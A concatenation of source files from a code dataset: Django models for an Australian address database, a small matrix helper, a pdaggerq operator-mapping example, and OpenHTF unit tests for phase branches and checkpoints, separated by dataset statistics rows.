date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
locality_pid = models.ForeignKey(Locality, models.DO_NOTHING, db_column='locality_pid', related_name='locality_neighbour_locality_pid', null=True)
neighbour_locality_pid = models.ForeignKey(Locality, models.DO_NOTHING, db_column='neighbour_locality_pid', related_name='locality_neighbour_neighbour_locality_pid', null=True)
class Meta:
managed = True
db_table = 'locality_neighbour'
class LocalityPoint(models.Model):
locality_point_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
locality_pid = models.ForeignKey(Locality, models.DO_NOTHING, db_column='locality_pid', null=True)
planimetric_accuracy = models.DecimalField(max_digits=12, decimal_places=0, blank=True, null=True)
longitude = models.DecimalField(max_digits=11, decimal_places=8, blank=True, null=True)
latitude = models.DecimalField(max_digits=10, decimal_places=8, blank=True, null=True)
class Meta:
managed = True
db_table = 'locality_point'
class Mb2011(models.Model):
mb_2011_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
mb_2011_code = models.CharField(max_length=15)
class Meta:
managed = True
db_table = 'mb_2011'
class Mb2016(models.Model):
mb_2016_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
mb_2016_code = models.CharField(max_length=15)
class Meta:
managed = True
db_table = 'mb_2016'
class MbMatchCodeAut(models.Model):
code = models.CharField(primary_key=True, max_length=15)
name = models.CharField(max_length=100)
description = models.CharField(max_length=250, blank=True, null=True)
class Meta:
managed = True
db_table = 'mb_match_code_aut'
class PrimarySecondary(models.Model):
primary_secondary_pid = models.CharField(primary_key=True, max_length=15)
primary_pid = models.ForeignKey(AddressDetail, models.DO_NOTHING, db_column='primary_pid', related_name='primary_secondary_primary_pid', null=True)
secondary_pid = models.ForeignKey(AddressDetail, models.DO_NOTHING, db_column='secondary_pid', related_name='primary_secondary_secondary_pid', null=True)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
ps_join_type_code = models.ForeignKey('PsJoinTypeAut', models.DO_NOTHING, db_column='ps_join_type_code', null=True)
ps_join_comment = models.CharField(max_length=500, blank=True, null=True)
class Meta:
managed = True
db_table = 'primary_secondary'
class PsJoinTypeAut(models.Model):
code = models.DecimalField(primary_key=True, max_digits=2, decimal_places=0)
name = models.CharField(max_length=50)
description = models.CharField(max_length=500, blank=True, null=True)
class Meta:
managed = True
db_table = 'ps_join_type_aut'
class State(models.Model):
state_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
state_name = models.CharField(max_length=50)
state_abbreviation = models.CharField(max_length=3)
class Meta:
managed = True
db_table = 'state'
class StreetClassAut(models.Model):
code = models.CharField(primary_key=True, max_length=1)
name = models.CharField(max_length=50)
description = models.CharField(max_length=200, blank=True, null=True)
class Meta:
managed = True
db_table = 'street_class_aut'
class StreetLocality(models.Model):
street_locality_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
street_class_code = models.ForeignKey(StreetClassAut, models.DO_NOTHING, db_column='street_class_code', null=True)
street_name = models.CharField(max_length=100)
street_type_code = models.ForeignKey('StreetTypeAut', models.DO_NOTHING, db_column='street_type_code', blank=True, null=True)
street_suffix_code = models.ForeignKey('StreetSuffixAut', models.DO_NOTHING, db_column='street_suffix_code', blank=True, null=True)
locality_pid = models.ForeignKey(Locality, models.DO_NOTHING, db_column='locality_pid', null=True)
gnaf_street_pid = models.CharField(max_length=15, blank=True, null=True)
gnaf_street_confidence = models.DecimalField(max_digits=1, decimal_places=0, blank=True, null=True)
gnaf_reliability_code = models.ForeignKey(GeocodeReliabilityAut, models.DO_NOTHING, db_column='gnaf_reliability_code', null=True)
class Meta:
managed = True
db_table = 'street_locality'
class StreetLocalityAlias(models.Model):
street_locality_alias_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
street_locality_pid = models.ForeignKey(StreetLocality, models.DO_NOTHING, db_column='street_locality_pid', null=True)
street_name = models.CharField(max_length=100)
street_type_code = models.ForeignKey('StreetTypeAut', models.DO_NOTHING, db_column='street_type_code', blank=True, null=True)
street_suffix_code = models.ForeignKey('StreetSuffixAut', models.DO_NOTHING, db_column='street_suffix_code', blank=True, null=True)
alias_type_code = models.ForeignKey('StreetLocalityAliasTypeAut', models.DO_NOTHING, db_column='alias_type_code', null=True)
class Meta:
managed = True
db_table = 'street_locality_alias'
class StreetLocalityAliasTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=10)
name = models.CharField(max_length=50)
description = models.CharField(max_length=15, blank=True, null=True)
class Meta:
managed = True
db_table = 'street_locality_alias_type_aut'
class StreetLocalityPoint(models.Model):
street_locality_point_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
street_locality_pid = models.ForeignKey(StreetLocality, models.DO_NOTHING, db_column='street_locality_pid', null=True)
boundary_extent = models.DecimalField(max_digits=7, decimal_places=0, blank=True, null=True)
planimetric_accuracy = models.DecimalField(max_digits=12, decimal_places=0, blank=True, null=True)
longitude = models.DecimalField(max_digits=11, decimal_places=8, blank=True, null=True)
latitude = models.DecimalField(max_digits=10, decimal_places=8, blank=True, null=True)
class Meta:
managed = True
db_table = 'street_locality_point'
class StreetSuffixAut(models.Model):
code = models.CharField(primary_key=True, max_length=15)
name = models.CharField(max_length=50)
description = models.CharField(max_length=30, blank=True, null=True)
class Meta:
managed = True
db_table = 'street_suffix_aut'
class StreetTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=15)
name = models.CharField(max_length=50)
description = models.CharField(max_length=15, blank=True, null=True)
class Meta:
managed = True
db_table = 'street_type_aut'
class Address(models.Model):
address_detail_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField(blank=True, null=True)
date_last_modified = models.DateField(blank=True, null=True)
date_retired = models.DateField(blank=True, null=True)
building_name = models.CharField(max_length=200, blank=True, null=True)
lot_number_prefix = models.CharField(max_length=2, blank=True, null=True)
lot_number = models.CharField(max_length=5, blank=True, null=True)
lot_number_suffix = models.CharField(max_length=2, blank=True, null=True)
lot_number_combined = models.TextField(blank=True, null=True)
flat_type_code = models.CharField(max_length=7, blank=True, null=True)
flat_number_prefix = models.CharField(max_length=2, blank=True, null=True)
flat_number = models.DecimalField(max_digits=5, decimal_places=0, blank=True, null=True)
flat_number_suffix = models.CharField(max_length=2, blank=True, null=True)
flat_number_combined = models.TextField(blank=True, null=True)
level_type_code = models.CharField(max_length=4, blank=True, null=True)
level_number_prefix = models.CharField(max_length=2, blank=True, null=True)
level_number = models.DecimalField(max_digits=3, decimal_places=0, blank=True, null=True)
level_number_suffix = models.CharField(max_length=2, blank=True, null=True)
level_number_combined = models.TextField(blank=True, null=True)
number_first_prefix = models.CharField(max_length=3, blank=True, null=True)
number_first = models.DecimalField(max_digits=6, decimal_places=0, blank=True, null=True)
number_first_suffix = models.CharField(max_length=2, blank=True, null=True)
number_first_combined = models.TextField(blank=True, null=True)
number_last_prefix = models.CharField(max_length=3, blank=True, null=True)
number_last = models.DecimalField(max_digits=6, decimal_places=0, blank=True, null=True)
number_last_suffix = models.CharField(max_length=2, blank=True, null=True)
number_last_combined = models.TextField(blank=True, null=True)
house_number = models.TextField(blank=True, null=True)
street_locality_pid = models.CharField(max_length=15, blank=True, null=True)
street_name = models.CharField(max_length=100, blank=True, null=True)
street_type = models.CharField(max_length=50, blank=True, null=True)
street_suffix_code = models.CharField(max_length=15, blank=True, null=True)
street_suffix_name = models.CharField(max_length=50, blank=True, null=True)
street = models.TextField(blank=True, null=True)
locality_pid = models.CharField(max_length=15, blank=True, null=True)
locality_name = models.CharField(max_length=100, blank=True, null=True)
state = models.CharField(max_length=3, blank=True, null=True)
alias_principal = models.CharField(max_length=1, blank=True, null=True)
postcode = models.CharField(max_length=4, blank=True, null=True)
confidence = models.DecimalField(max_digits=1, decimal_places=0, blank=True, null=True)
address_site_pid = models.CharField(max_length=15, blank=True, null=True)
address_type_name = models.CharField(max_length=50, blank=True, null=True)
address_site_name = models.CharField(max_length=200, blank=True, null=True)
level_geocoded_code = models.DecimalField(max_digits=2, decimal_places=0, blank=True, null=True)
primary_secondary = models.CharField(max_length=1, blank=True, null=True)
latitude = models.DecimalField(max_digits=10, decimal_places=8, blank=True, null=True)
longitude = models.DecimalField(max_digits=11, decimal_places=8, blank=True, null=True)
class Meta:
managed = True
db_table = 'address'
| 47.828974
| 180
| 0.752135
| 3,199
| 23,771
| 5.340731
| 0.047827
| 0.08007
| 0.105765
| 0.138308
| 0.876207
| 0.847878
| 0.813287
| 0.805853
| 0.789406
| 0.764472
| 0
| 0.019391
| 0.140886
| 23,771
| 496
| 181
| 47.925403
| 0.817207
| 0
| 0
| 0.575448
| 0
| 0
| 0.076732
| 0.022002
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.002558
| 0
| 0.820972
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
1785f02aa39f5af36b083c02f332e467dcca005b
| 72
|
py
|
Python
|
exams/exam2/zero_matrix.py
|
NoHomey/monte-carlo-methods
|
d1e055c713a96990d532b3ed7ff7b67bd65d39fe
|
[
"MIT"
] | null | null | null |
exams/exam2/zero_matrix.py
|
NoHomey/monte-carlo-methods
|
d1e055c713a96990d532b3ed7ff7b67bd65d39fe
|
[
"MIT"
] | null | null | null |
exams/exam2/zero_matrix.py
|
NoHomey/monte-carlo-methods
|
d1e055c713a96990d532b3ed7ff7b67bd65d39fe
|
[
"MIT"
] | null | null | null |
def zero_matrix(n):
return [[0 for j in range(n)] for i in range(n)]
| 36
| 52
| 0.638889
| 16
| 72
| 2.8125
| 0.6875
| 0.311111
| 0.355556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017544
| 0.208333
| 72
| 2
| 52
| 36
| 0.77193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
da414e248af43e6dbfc1395865436c8f352d6e71
| 1,057
|
py
|
Python
|
examples/rdm_mappings.py
|
maxscheurer/pdaggerq
|
e9fef3466e0d0170afc3094ab79e603200e78dfb
|
[
"Apache-2.0"
] | 37
|
2020-09-17T19:29:18.000Z
|
2022-03-03T16:29:16.000Z
|
examples/rdm_mappings.py
|
maxscheurer/pdaggerq
|
e9fef3466e0d0170afc3094ab79e603200e78dfb
|
[
"Apache-2.0"
] | 7
|
2021-02-28T19:22:12.000Z
|
2022-02-22T15:17:47.000Z
|
examples/rdm_mappings.py
|
maxscheurer/pdaggerq
|
e9fef3466e0d0170afc3094ab79e603200e78dfb
|
[
"Apache-2.0"
] | 6
|
2021-02-16T22:34:29.000Z
|
2021-12-04T19:37:23.000Z
|
"""
Example for vacuum normal ordering the T2 operator for 2-RDM theory
"""
import pdaggerq
def main():
print("T2 mappings")
ahat = pdaggerq.pq_helper('true')
ahat.set_string(['i*','j*','k','n*','m', 'l'])
ahat.add_new_string()
ahat.set_string(['n*','m','l', 'i*','j*', 'k'])
ahat.add_new_string()
ahat.simplify()
ahat.print()
ahat.clear()
print("T1 mappings")
ahat = pdaggerq.pq_helper('true')
ahat.set_string(['i*','j*','k*','n','m', 'l'])
ahat.add_new_string()
ahat.set_string(['n','m','l', 'i*','j*', 'k*'])
ahat.add_new_string()
ahat.simplify()
ahat.print()
ahat.clear()
print("Q -> D")
ahat = pdaggerq.pq_helper('true')
ahat.set_string(['i', 'j', 'k*', 'l*'])
ahat.add_new_string()
ahat.simplify()
ahat.print()
ahat.clear()
print("G -> D")
ahat = pdaggerq.pq_helper('true')
ahat.set_string(['i*', 'j', 'k*', 'l'])
ahat.add_new_string()
ahat.simplify()
ahat.print()
ahat.clear()
if __name__ == "__main__":
main()
| 22.489362
| 67
| 0.555345
| 150
| 1,057
| 3.713333
| 0.26
| 0.075404
| 0.140036
| 0.172352
| 0.816876
| 0.816876
| 0.816876
| 0.816876
| 0.816876
| 0.816876
| 0
| 0.004773
| 0.20719
| 1,057
| 47
| 68
| 22.489362
| 0.659905
| 0.063387
| 0
| 0.611111
| 0
| 0
| 0.107833
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.027778
| 0
| 0.055556
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da461dce6cc6c1fcee95c0fda2ee2fe41613829a
| 28,928
|
py
|
Python
|
test/core/phase_branches_test.py
|
frankalicious/openhtf
|
f74740065eac9b1af96638f100b816ec773f084b
|
[
"Apache-2.0"
] | 372
|
2015-09-02T00:08:40.000Z
|
2022-03-30T17:29:30.000Z
|
test/core/phase_branches_test.py
|
frankalicious/openhtf
|
f74740065eac9b1af96638f100b816ec773f084b
|
[
"Apache-2.0"
] | 772
|
2015-09-01T22:00:20.000Z
|
2022-02-10T14:53:14.000Z
|
test/core/phase_branches_test.py
|
frankalicious/openhtf
|
f74740065eac9b1af96638f100b816ec773f084b
|
[
"Apache-2.0"
] | 204
|
2015-09-01T20:48:21.000Z
|
2022-03-13T22:20:50.000Z
|
"""Tests for google3.third_party.py.openhtf.test.core.phase_branches."""
import unittest
import mock
import openhtf as htf
from openhtf.core import phase_branches
from openhtf.core import phase_executor
from openhtf.core import test_record
from openhtf.util import test as htf_test
class BranchDiagResult(htf.DiagResultEnum):
SET = 'set'
NOT_SET = 'not_set'
@htf.PhaseDiagnoser(BranchDiagResult)
def branch_diagnoser(phase_rec):
del phase_rec # Unused.
return htf.Diagnosis(BranchDiagResult.SET)
@htf.diagnose(branch_diagnoser)
def add_set_diag():
pass
@htf.PhaseOptions()
def run_phase():
pass
@htf.PhaseOptions()
def fail_phase():
return htf.PhaseResult.FAIL_AND_CONTINUE
@htf.PhaseOptions()
def error_phase():
raise Exception('broken')
def _rename(phase, new_name):
assert isinstance(new_name, str)
return htf.PhaseOptions(name=new_name)(phase)
def _fake_phases(*new_names):
return [_rename(run_phase, name) for name in new_names]
phase0, phase1, phase2, phase3 = _fake_phases('phase0', 'phase1', 'phase2',
'phase3')
skip0 = _rename(run_phase, 'skip0')
class BranchSequenceTest(unittest.TestCase):
def test_as_dict(self):
branch = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase,))
expected = {
'name': None,
'nodes': [run_phase._asdict()],
'diag_condition': {
'condition': phase_branches.ConditionOn.ALL,
'diagnosis_results': [BranchDiagResult.SET],
},
}
self.assertEqual(expected, branch._asdict())
def test_with_args(self):
branch = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase,),
name='name_{arg}')
expected = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase.with_args(arg=1),),
name='name_1')
self.assertEqual(expected, branch.with_args(arg=1))
def test_with_plugs(self):
class MyPlug(htf.BasePlug):
pass
branch = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase,),
name='name_{my_plug.__name__}')
expected = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase.with_plugs(my_plug=MyPlug),),
name='name_MyPlug')
self.assertEqual(expected, branch.with_plugs(my_plug=MyPlug))
def test_load_code_info(self):
branch = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase,))
expected = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase.load_code_info(),))
self.assertEqual(expected, branch.load_code_info())
def test_apply_to_all_phases(self):
def do_rename(phase):
return _rename(phase, 'blah_blah')
branch = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(run_phase,))
expected = phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
nodes=(do_rename(run_phase),))
self.assertEqual(expected, branch.apply_to_all_phases(do_rename))
class BranchSequenceIntegrationTest(htf_test.TestCase):
def _assert_phase_names(self, expected_names, test_rec):
run_phase_names = [p.name for p in test_rec.phases[1:]]
self.assertEqual(expected_names, run_phase_names)
@htf_test.yields_phases
def test_branch_taken(self):
nodes = [
add_set_diag,
phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.SET),
run_phase),
]
test_rec = yield htf.Test(nodes)
self.assertTestPass(test_rec)
self._assert_phase_names(['add_set_diag', 'run_phase'], test_rec)
self.assertEqual([
test_record.BranchRecord(
name=None,
diag_condition=phase_branches.DiagnosisCondition(
condition=phase_branches.ConditionOn.ALL,
diagnosis_results=(BranchDiagResult.SET,)),
branch_taken=True,
evaluated_millis=mock.ANY)
], test_rec.branches)
@htf_test.yields_phases
def test_branch_not_taken(self):
nodes = [
phase_branches.BranchSequence(
phase_branches.DiagnosisCondition.on_all(BranchDiagResult.NOT_SET),
run_phase),
]
test_rec = yield htf.Test(nodes)
self.assertTestPass(test_rec)
self._assert_phase_names([], test_rec)
self.assertEqual([
test_record.BranchRecord(
name=None,
diag_condition=phase_branches.DiagnosisCondition(
condition=phase_branches.ConditionOn.ALL,
diagnosis_results=(BranchDiagResult.NOT_SET,)),
branch_taken=False,
evaluated_millis=mock.ANY)
], test_rec.branches)
class PhaseFailureCheckpointIntegrationTest(htf_test.TestCase):
def test_invalid_action(self):
with self.assertRaises(ValueError):
phase_branches.PhaseFailureCheckpoint.last(
'bad_action', action=htf.PhaseResult.CONTINUE)
def test_asdict(self):
checkpoint = phase_branches.PhaseFailureCheckpoint.last('checkpoint')
self.assertEqual(
{
'name': 'checkpoint',
'action': htf.PhaseResult.STOP,
'previous_phases_to_check': phase_branches.PreviousPhases.LAST,
}, checkpoint._asdict())
@htf_test.yields_phases
def test_last__no_previous_phases(self):
self.test_start_function = None
test_rec = yield htf.Test(
phase_branches.PhaseFailureCheckpoint.last('last_prev'))
self.assertTestError(test_rec)
self.assertTestOutcomeCode(test_rec, 'NoPhasesFoundError')
self.assertEqual(0, len(test_rec.phases))
self.assertEqual([
test_record.CheckpointRecord(
name='last_prev',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
phase_executor.ExceptionInfo(phase_branches.NoPhasesFoundError,
mock.ANY, mock.ANY)),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last__no_failures(self):
test_rec = yield htf.Test(
phase0, phase_branches.PhaseFailureCheckpoint.last('last_pass'), phase1)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1')
self.assertEqual([
test_record.CheckpointRecord(
name='last_pass',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last__failure_too_early(self):
test_rec = yield htf.Test(
fail_phase, phase0,
phase_branches.PhaseFailureCheckpoint.last('last_early_fail'), phase1)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_early_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last__failure_too_late(self):
test_rec = yield htf.Test(
phase0, phase_branches.PhaseFailureCheckpoint.last('last_late_fail'),
fail_phase, phase1)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_late_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last__failure(self):
test_rec = yield htf.Test(
phase0, fail_phase,
phase_branches.PhaseFailureCheckpoint.last('last_fail'), error_phase)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(htf.PhaseResult.STOP),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last_fail_subtest__not_in_subtest(self):
test_rec = yield htf.Test(
fail_phase,
phase_branches.PhaseFailureCheckpoint.last(
'last_subtest', action=htf.PhaseResult.FAIL_SUBTEST), error_phase)
self.assertTestError(test_rec)
self.assertTestOutcomeCode(test_rec, 'InvalidPhaseResultError')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
phase_executor.ExceptionInfo(
phase_executor.InvalidPhaseResultError, mock.ANY,
mock.ANY)),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last_fail_subtest__pass_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', phase1,
phase_branches.PhaseFailureCheckpoint.last(
'last_pass_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
phase2), phase3)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2', 'phase3')
self.assertEqual([
test_record.CheckpointRecord(
name='last_pass_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last_fail_subtest__early_fail_out_of_subtest(self):
test_rec = yield htf.Test(
fail_phase, phase0,
htf.Subtest(
'sub', phase1,
phase_branches.PhaseFailureCheckpoint.last(
'last_pass_early_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
phase2), phase3)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2', 'phase3')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_pass_early_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last_fail_subtest__early_fail_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', fail_phase, phase1,
phase_branches.PhaseFailureCheckpoint.last(
'last_fail_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
phase2), phase3)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2', 'phase3')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_fail_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_last_fail_subtest__fail_in_subtest(self):
test_rec = yield htf.Test(
phase0,
htf.Subtest(
'sub', phase1, fail_phase,
phase_branches.PhaseFailureCheckpoint.last(
'last_fail_subtest', action=htf.PhaseResult.FAIL_SUBTEST),
skip0), phase2)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1', 'phase2')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.SKIP, test_rec,
'skip0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='last_fail_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
conditional=phase_branches.PreviousPhases.LAST,
subtest_name='sub',
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.FAIL_SUBTEST),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all__no_previous_phases(self):
self.test_start_function = None
test_rec = yield htf.Test(
phase_branches.PhaseFailureCheckpoint.all_previous('all_prev'))
self.assertTestError(test_rec)
self.assertTestOutcomeCode(test_rec, 'NoPhasesFoundError')
self.assertEqual([
test_record.CheckpointRecord(
name='all_prev',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
phase_executor.ExceptionInfo(phase_branches.NoPhasesFoundError,
mock.ANY, mock.ANY)),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all__pass(self):
test_rec = yield htf.Test(
phase0, phase_branches.PhaseFailureCheckpoint.all_previous('all_pass'),
phase1)
self.assertTestPass(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0', 'phase1')
self.assertEqual([
test_record.CheckpointRecord(
name='all_pass',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(
htf.PhaseResult.CONTINUE),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all__fail(self):
test_rec = yield htf.Test(
fail_phase,
phase_branches.PhaseFailureCheckpoint.all_previous('all_fail'),
error_phase)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(htf.PhaseResult.STOP),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all__earlier_fail(self):
test_rec = yield htf.Test(
fail_phase, phase0,
phase_branches.PhaseFailureCheckpoint.all_previous('all_earlier_fail'),
error_phase)
self.assertTestFail(test_rec)
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.PASS, test_rec,
'phase0')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_earlier_fail',
action=htf.PhaseResult.STOP,
conditional=phase_branches.PreviousPhases.ALL,
subtest_name=None,
result=phase_executor.PhaseExecutionOutcome(htf.PhaseResult.STOP),
evaluated_millis=htf_test.VALID_TIMESTAMP),
], test_rec.checkpoints)
@htf_test.yields_phases
def test_all_fail_subtest__not_in_subtest(self):
test_rec = yield htf.Test(
fail_phase,
phase_branches.PhaseFailureCheckpoint.all_previous(
'all_subtest', action=htf.PhaseResult.FAIL_SUBTEST), error_phase)
self.assertTestError(test_rec)
self.assertTestOutcomeCode(test_rec, 'InvalidPhaseResultError')
self.assertPhasesOutcomeByName(test_record.PhaseOutcome.FAIL, test_rec,
'fail_phase')
self.assertEqual([
test_record.CheckpointRecord(
name='all_subtest',
action=htf.PhaseResult.FAIL_SUBTEST,
